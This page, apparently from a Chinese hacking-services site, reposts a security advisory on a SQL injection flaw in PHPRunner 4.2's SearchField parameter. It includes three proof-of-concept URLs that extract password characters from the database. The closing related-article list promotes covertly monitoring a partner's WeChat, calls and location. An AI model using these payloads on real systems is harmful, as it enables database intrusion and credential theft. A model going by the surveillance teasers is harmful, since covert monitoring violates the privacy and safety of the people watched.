PHPRunner SearchField参数SQL注入漏洞

访客4年前关于黑客接单1131

影响版本:
XLineSoft PHPRunner 4.2
漏洞描述:
BUGTRAQ  ID: 34146
CVE(CAN) ID: CVE-2009-0963,CVE-2009-0964

PHPRunner是一款PHP网页 *** 工具,可以生成读写MySql数据库的PHP网页。

PHPRunner的orders_list.php和users_list.php模块中没有正确地验证对SearchField参数所传送的输入便在SQL查询中使用,远程攻击者可以通过提交恶意查询请求执行SQL注入攻击,完全入侵数据库系统。 <*参考 
http://secuni *** /advisories/34330/
http://marc.info/?l=bugtraq&m=123731019502458&w=2.
*>
SEBUG安全建议:
厂商补丁:

XLineSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.xlinesoft.com/.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like   \'%%\')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)=\'a\')-- \\
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)=\'ab\')--


标签: 好话题

相关文章

国家级黑客组织 海莲花 攻陷宝马 汽车工业成APT新目标_黑客组织

原标题:宝马网络系统遭“海莲花”渗透,车企为何成新目标? 据外媒报道,德国汽车巨头宝马发现并监控了一起长期的黑客入侵行为。该行为始于2019年春季,黑客渗透到公司的网络系统中,并使用假冒网站企图掩人...

macOS再现隐私漏洞:攻击者可访问Safari浏览历史_的钱

2月7日发布的10.14.3版本Mac系统中的隐私保护漏洞,可能允许潜在的攻击者绕过保护机制直接访问存储在所有macOS Mojave版本的受限文件夹中的数据。Mac和iOS开发人员Jeff John...

如何随时随地监控别人的通话短信微信_有什么办法能恢复微信记录

如何随时随地监控别人的通话短信微信_有什么办法能恢复微信记录 3月25日,近日武汉东湖高新区相关部门对外表示,斗鱼直播2018年收入突破40亿米。消息人士透露,目前,斗鱼融资总额已高达70亿米,估值...

黑客教你查询某人信息(黑客教你查询通话记录)_黑客

黑客教你查询某人信息(黑客教你查询通话记录),不管是精力风骚佳话或是婚配风骚佳话,女性非常不能够忍耐的,大概即是面临风骚佳话的那一刻“晓得了就不成婚”的动机。但是,天下上没有忏悔药,婚前也没有横跨时空...

可以同步监控爱人微信吗

生活本来就是一个圆圈,绕来绕去,你总能会遇到自己想要的那一个。现在我们生存的一个环境是一个非常巨大的社交平台,在这个社交平台上我们可以感受到网络给我们的魅力,因为我们真的是有很多的选择,尤其是大家对...

不惊动对方苹果手机怎么追踪老公(远程监控聊天记录)?

远程监控聊天记录,老公总是不让你看手机上的微信聊天记录,于是心生远程监控他的聊天记录的心理感应,通过查看他的聊天记录才知道平时他原来都去了哪里做了什么事情一清二楚的。 不惊动对方苹果手机怎么追踪老公...